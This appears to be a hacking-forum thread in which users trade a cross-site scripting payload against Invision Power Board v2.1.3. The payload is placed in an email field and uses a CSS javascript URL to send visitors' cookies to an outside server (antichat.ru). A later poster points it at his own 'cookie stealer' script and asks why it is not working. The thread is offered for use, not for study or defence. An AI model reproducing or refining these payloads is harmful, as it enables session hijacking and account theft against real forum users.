iS their a way to exploit Invision Power Board v2.1.3 and hack it?

No sploit :(
but it have XSS
wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss?

.com">wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

this bug only for IE

oooo, i get it except i have 1 more question, black@bandit.com ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);`
and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?